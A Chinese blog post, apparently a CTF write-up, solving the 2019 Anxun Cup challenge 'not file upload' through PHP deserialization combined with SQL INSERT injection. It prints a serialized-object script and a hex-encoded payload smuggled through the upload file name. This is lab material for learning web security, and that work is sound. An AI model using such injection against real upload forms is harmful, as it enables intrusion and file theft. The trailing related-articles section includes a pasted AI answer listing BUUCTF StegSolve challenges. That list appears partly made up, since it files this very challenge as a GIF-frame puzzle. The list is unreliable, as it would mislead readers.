[安洵杯 2019]不是文件上传

最新推荐文章于 2025-04-02 08:25:37 发布
原创 最新推荐文章于 2025-04-02 08:25:37 发布 · 178 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#buu

本文探讨了PHP中helper类的序列化及反序列化过程,展示了如何通过构造特定的序列化字符串来触发潜在的安全漏洞,并提供了具体的SQL插入示例。

在这里插入图片描述
在这里插入图片描述

buu给了源码链接,还是直接去看源码吧

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

简单看了一下,意思就是上传图片,假如helper中以序列化形式保存图片,那么在show中就可以反序列化

<?php
class helper {
    protected $ifview = True;
    protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
//O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}


然后因为变量属性是protected 需要在变量名前加上\x00*\x00变量名,private则是要在变量名前加上\x00类名\x00变量名
$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
$attr = unserialize($attr_temp);
所以下面用\0\0\0去填充,show反序列化前会换回去


//O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

SQL语句
INSERT INTO images (implode(",",$sql_fields)) VALUES(implode(",",$sql_val))
$sql_fields[] = "`".$key_temp."`";
$sql_val[] = "'".$value_temp."'";
title,fileame,ext,path,attr
//title这里是可控的,单引号闭合

//0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d
1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d)#.jpg

在这里插入图片描述
在这里插入图片描述

全网最细安洵2019 不是文件上传刷题笔记
m0_74925562的博客
12-24 1515
可以看出filename变量最终是由时间随机生成的文件名加上白名单后缀,而title值没有进行过滤,直接拼接传入文件名的名字去掉后缀,那我们就应该这样想,是不是可以构造恶意文件名,达到特殊的目的,我们继续往下看。没有经过过滤传入了数组,然后数组被传入数据库中,然后当反序列化时利用sql语句提前闭合,来使反序列化的对象为。的触发条件是当对象被销毁时,这里肯定是需要反序列化的,用seay的全局查找功能找一下反序列化函数。将图像属性的长和高进行序列化,然后再统一存进数据库中,我们来分析一下存入数据库的函数。
[安洵 2019]不是文件上传 文件上传的注入
m0_67401270的博客
05-15 388
进入题目传了一个jpg图片上去 发现文件名被重命名了,但是给了我们一个path路径(难道就是一个绕过题?这么轻松就会告诉你路径,跟题目有点不符) 啪啪打脸,各个地方抓一下包show.php,upload.php以及show.phpdelete_all=true,按照经验我们应该在某个地方是可以获取到这些源码的,但是我这里找了很久根本找不到……,只能再一次求助别人的wp…… 没想到的是!!! 根据这条信息去github找这个出题人 获得源码,好好代码审计了(不愧是锻炼搜索能力,获得源码的方式长见识了)
BUUCTF】[安洵 2019]不是文件上传1及知识点
2401_86760082的博客
01-25 889
注入方法、分析代码中的SQL语句构造、构造恶意文件名、这个代码通过反序列化数据库 中的内容,输出图片、知识点
[安洵 2019]不是文件上传1
m0_62129839的博客
02-22 296
又因为上传的文件名中不能有双引号,所以将payload进行16进制编码,别忘了前面加上0x。这道题首先给了源码,但是我没看到,进了页面,他储存的文件并不保存在他数据库,也不像是sql注入,所以扫描文件,拿到源码,审计。第一个可疑的地方是show.php里面的$attr变量,这里有一个反序列化。最后用#注释掉’value2’,‘value3’,…我审计的时候没看到,wp告诉我的,实际上这个位置很明显。三行字信息量巨大,全是我不会的小细节。php序列化代码,抄wp的。的图片,查看,得到flag。
buuCTF [安洵 2019]不是文件上传 1
weixin_45642610的博客
08-06 759
buuCTF [安洵 2019]不是文件上传 1 这题给了源码,buuctf上直接给了。GitHub上搜索wowouploadimage也搜得到 三个文件 upload.php <!DOCTYPE html> <html> <head> <title>Image Upload</title> <link rel="stylesheet" href="./style.css"> <meta http-equiv="cont
BUUCTF:[安洵 2019]不是文件上传
末初 · mochu7
03-28 2745
这题和攻防世界XCTF:upload有点像,看似上传却都不是上传是上传图片的文件名注入 参考:安洵2019 官方Writeup 获取源码 在网站首页存在一些信息 在gihtub找得到源码 BUU也给出了这题的源码 漏洞分析 在图片上传处,check函数并未对文件名(title)进行检测, 直接传递到最后的SQL语句当中。导致了SQL注入,并且属于Insert注入。 审计代码后可知,图片...
[代码审计]-安洵 2019 不是文件上传
Re_ly0n的博客
10-07 1726
说在前面 代码审计题目,buu平台给了源码链接,可自行下载 代码分析 代码下载完成后开始分析,看到了序列化和反序列化函数,尝试利用。 给三个php文件都看了一遍之后发现可以通过构造序列化去读取flag文件。 构造payload <?php class helper { protected $ifview = True; protected $config = "/flag"; } $a = new helper(); $b = serialize($a); echo
[安洵 2019]Attack
weixin_34979095的博客
08-16 1000
再次以关键词:.dmp搜索,在右下方窗口发现sass.dmp,返回的是tcp833流超大,足足34MB,是系统转储文件lsass.dmp,导出对象——http 只导出lsass.dmp。下载mimikatz_trunk压缩包,解压到指定路径,把lsass.dmp也拷贝过来,一定要拷贝在对应的。下载题目,得到一个Attack.pcap文件,使用wireshark打开,过滤条件选择http, 回车。按下CTL+F快捷键,搜索条件以此选择分组字节流,字符串,关键词设为flag,回车。今天突不能上传图片了。
安洵 2019不是文件上传
XiaoHei的博客
04-02 35
代码审计+反序列化+pop链+变量分析?
BUUCTF:[安洵 2019]不是文件上传 -- sql注入,PHP反序列化,sql16进制 单引号问题,
Zero_Adam的博客
04-04 627
目录:一、自己看着源码+WP复现 一、自己看着源码+WP复现 这周写了个上传下载文件的网站后,再做这种 文件上传相关的题目时就轻松多了,,至少代码是干什么的能看明白了, 其实数据库的键值是什么也看了有一会儿才看出来,然后才在本地复现的。 create database pic_base create table images( title varchar(100), filename varchar(100), ext varchar(100), path varchar(200), attr varch
BUUCTF_[安洵 2019]easy_web(preg_match绕过/MD5强碰撞绕过/代码审计)
2401_87524087的博客
02-02 1373
打开靶场,出现下面的静态html页面,也没有找到什么有价值的信息。查看页面源代码在url里发现了img传参还有cmd。
[安洵-不是文件上传]代码审计+文件上传+insert注入
leekos的博客,分享web安全相关知识~
07-31 425
的话,当helper对象会序列化就会读取flag的内容,并且输出,这是利用点。如图成功转为字符串,所以我们插入16进制就会转为字符串插入到数据库,这样取出来就可以成功反序列化啦。经过序列化后的值,所以我们需要构造一下,将该值替换为恶意构造的序列化串。在这个函数中会执行sql语句,将输入插入到字符串,但是这里存在。默认的值是图片的宽高数组序列化后的值,没法控制输入。在upload()函数中,会将相关信息保存在。我们需要构造一个特定值序列化后的串,然后经过。属性的值先替换一下然后反序列化,这个属性就是。
JavaScript下拉框选择跳转页面
最新发布
12-31
下载前必看:https://pan.quark.cn/s/a4b39357ea24 在本资料中,将阐述如何运用JavaScript达成单击下拉列表框选定选项后即时转向对应页面的功能。 此种技术适用于网页布局中用户需迅速选取并转向不同页面的情形,诸如网站导航栏或内容目录等场景。 达成此功能,能够显著改善用户交互体验,精简用户的操作流程。 我们须熟悉HTML里的`<select>`组件,该组件用于构建一个选择列表。 用户可从中选定一项,并可引发一个事件来响应用户的这一选择动作。 在本次实例中,我们借助`onchange`事件监听器来实现当用户在下拉列表框中选定某个选项时,页面能自动转向该选项关联的链接地址。 JavaScript里的`window.location`属性旨在获取或设定浏览器当前载入页面的网址,通过变更该属性的值,能够实现页面的转向。 在本次实例的实现方案里,运用了`eval()`函数来动态执行字符串表达式,这在现代的JavaScript开发实践中通常不被推荐使用,因为它可能诱发安全问题及难以排错的错误。 然而,为了本例的简化展示,我们暂时搁置这一问题,因为在更复杂的实际应用中,可选用其他方法,例如ES6中的模板字符串或其他函数来安全地构建和执行字符串。 具体到本例的代码实现,`MM_jumpMenu`函数负责处理转向逻辑。 它接收三个参数:`targ`、`selObj`和`restore`。 其中`targ`代表要转向的页面,`selObj`是触发事件的下拉列表框对象,`restore`是标志位,用以指示是否需在转向后将下拉列表框的选项恢复至默认的提示项。 函数的实现通过获取`selObj`中当前选定的`selectedIndex`对应的`value`属性值,并将其赋予`...
为什么说新一代成果转化SaaS是中小技术转移机构提升服务标准化水平的关键一步?.docx
12-31
为什么说新一代成果转化SaaS是中小技术转移机构提升服务标准化水平的关键一步?
协同路径多Dubins路径段协同路径规研究(Matlab代码实现)
12-31
【协同路径】多Dubins路径段协同路径规研究(Matlab代码实现)内容概要:本文围绕“多Dubins路径段协同路径规划”展开研究,利用Matlab代码实现多智能体(如无人机、机器人)在复杂环境下的协同路径规划。重点在于结合Dubins路径模型,解决带有方向约束的最短路径问题,并通过优化算法实现多个体之间的路径协同与避碰,提升整体系统的运行效率与安全性。文中提供了完整的Matlab仿真代码,涵盖路径生成、协同优化与可视化等关键环节,适用于复杂威胁环境下的多平台协同任务。; 适合人群:具备一定Matlab编程基础,从事自动化、 robotics、路径规划或智能系统相关研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①应用于无人机、无人车等多智能体系统的协同路径规划任务;②用于解决带运动学约束的最优路径生成与避障问题;③支撑科研复现、算法优化及教学演示。; 阅读建议:建议结合Matlab代码与理论部分同步阅读,重点关注Dubins路径构建逻辑与协同优化策略的实现细节,可通过调整参数和场景进行算法性能测试与拓展应用。
物理带电粒子在磁场和电场中移动的 3D 轨迹研究(Matlab代码实现)
12-31
【物理】带电粒子在磁场和电场中移动的 3D 轨迹研究(Matlab代码实现)内容概要:本文介绍了《【物理】带电粒子在磁场和电场中移动的 3D 轨迹研究(Matlab代码实现)》这一科研资源,重点在于利用Matlab编程实现带电粒子在电磁复合场中的三维运动轨迹仿真。通过数值求解洛伦兹力作用下的粒子动力学方程,模拟其在不同电场与磁场配置下的运动行为,帮助理解粒子在电磁场中的偏转、螺旋运动等物理现象。文中提供了完整的Matlab代码实现框架,便于读者复现和进一步拓展研究。; 适合人群:具备一定物理基础知识和Matlab编程能力的高校学生、研究生及科研人员,尤其适用于从事电磁学、粒子动力学或计算物理相关研究的人员。; 使用场景及目标:①用于教学演示带电粒子在电磁场中的运动规律;②支持科研中对粒子轨迹的建模与仿真分析;③作为课程设计或毕业设计的技术参考,提升数值仿真与编程实践能力。; 阅读建议:建议读者结合电磁学理论基础,仔细阅读代码结构与注释,尝试调整电场、磁场参数或初始条件以观察轨迹变化,深入理解物理机制,并可在此基础上扩展至更多复杂场型或引入相对论效应。
计算机二级考试的相关资料(理论+操作),计算机二级考试理论部分 Excel函数总结 部分题库选择题(400+) 未来教育精选(1-24)
12-31
计算机二级考试的相关资料(理论+操作),计算机二级考试理论部分 Excel函数总结 部分题库选择题(400+) 未来教育精选(1-24)
buuctf中使用stegsolve的题列出来
10-14
<think>我们正在整理BUUCTF中使用StegSolve工具的题目列表。根据之前的讨论,使用StegSolve的题目通常涉及以下技术点: - 直接查看文件格式(Analyze→File Format) - 通道分离(Data Extract功能,按BGR顺序等) - 辅助分析文件结构(配合binwalk) - LSB隐写分析 - GIF帧分析 由于BUUCTF题目数量众多且持续更新,以下列表基于常见题目及公开Writeup整理,按题型分类: ### 一、直接文件格式查看 1. **题目名称**:`stego1`(或类似名称) **关键操作**: - StegSolve中`Analyze → File Format` - 在文件头部直接找到flag字符串[^2] ### 二、通道分离类题目 1. **二维码类型题目** - `二维码`:通过Data Extract按BGR顺序提取出隐藏的PNG图片,修复高度后扫描二维码[^3] - `another_qr`:类似操作,可能需要调整位平面组合 2. **颜色通道异常题目** - `ColorfulImage`:查看各通道发现某个通道含异常信息 - `red_green_blue`:通过Image Combiner对比通道差异 ### 三、LSB隐写题目 1. **基础LSB** - `lsb1`:RGB最低位平面组合(Bit Planes: Red0, Green0, Blue0) - `lsb2`:仅某个通道最低位有效(如Blue0) 2. **进阶LSB** - `pixels`:提取像素值后需转换ASCII - `white_word`:白色背景隐藏文字,需调整阈值查看 ### 四、GIF分析题目 1. **逐帧检查** - `gif_magic`:Frame Browser中发现某帧含flag - `flash_ctf`:多帧合成信息 2. **颜色表分析** - `palette`:修改调色板顺序后显示文字 ### 五、组合工具题目 1. **StegSolve+binwalk** - `hidden_file`:binwalk发现ZIP,StegSolve辅助提取 - `double_trouble`:先通道分离再结合foremost 2. **StegSolve+高度修复** - `broken_qr`:提取不完整二维码后修改PNG高度值[^4] > 注:部分题目存在多解法,StegSolve可能非唯一工具。 §§相关问题§§ 1. 如何修复StegSolve提取出的不完整PNG图片? 2. BUUCTF中哪些LSB题目需要调整位平面组合? 3. 使用StegSolve分析GIF时有哪些注意事项? 4. 通道分离时BGR顺序和RGB顺序有什么区别? 5. 最新BUUCTF题目中是否有StegSolve的新颖用法? </think>以下是BUUCTF平台中需要使用StegSolve工具的典型题目列表,按解题技术分类整理: ### 一、通道分离与位平面分析 1. **LSB隐写类** - `[MRCTF2020] 不眠之夜`:需在Data Extract中组合Red0/Green0/Blue0位平面 - `[ACTF新生赛2020] 像素猫`:RGB通道分离后提取像素值转换ASCII - `[GXYCTF2019] 白给的词`:白色背景文字隐写,需调整Brightness阈值 2. **通道异常检测** - `[BJDCTF2020] 藏藏藏`:Blue通道含Base64编码[^4] - `[HBNIS2018] 低个头`:仅Green通道含有效信息 ### 二、文件结构分析 1. **隐藏文件提取** - `[SUCTF2018] 单文件`:配合binwalk发现ZIP,用Data Extract提取[^1] - `[安洵2019] 吹着贝斯扫二维码`:Frame Browser分析分块结构 2. **文件头修复** - `[WUSTCTF2020] 颜值成绩查询`:提取二维码后需修复PNG高度[^3] - `[GUET-CTF2019] 虚假的压缩包`:StegSolve发现异常文件尾 ### 三、动态图分析 1. **GIF帧检查** - `[安洵2019] 不是文件上传`:Frame Browser发现隐藏帧 - `[RCTF2019] 抽老婆`:多帧合成flag 2. **调色板异常** - `[SWPU2019] 神奇的二维码`:颜色表修改后显示完整二维码 ### 四、复合型题目 1. **多层隐写** - `[MRCTF2020] 禁止套娃`:先通道分离→再LSB分析→最后Base64解码 - `[UTCTF2020] 听首音乐`:频谱图+StegSolve通道异或 > 注:部分题目需配合其他工具(如010 Editor修复高度、Audacity分析音频)[^3][^4]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值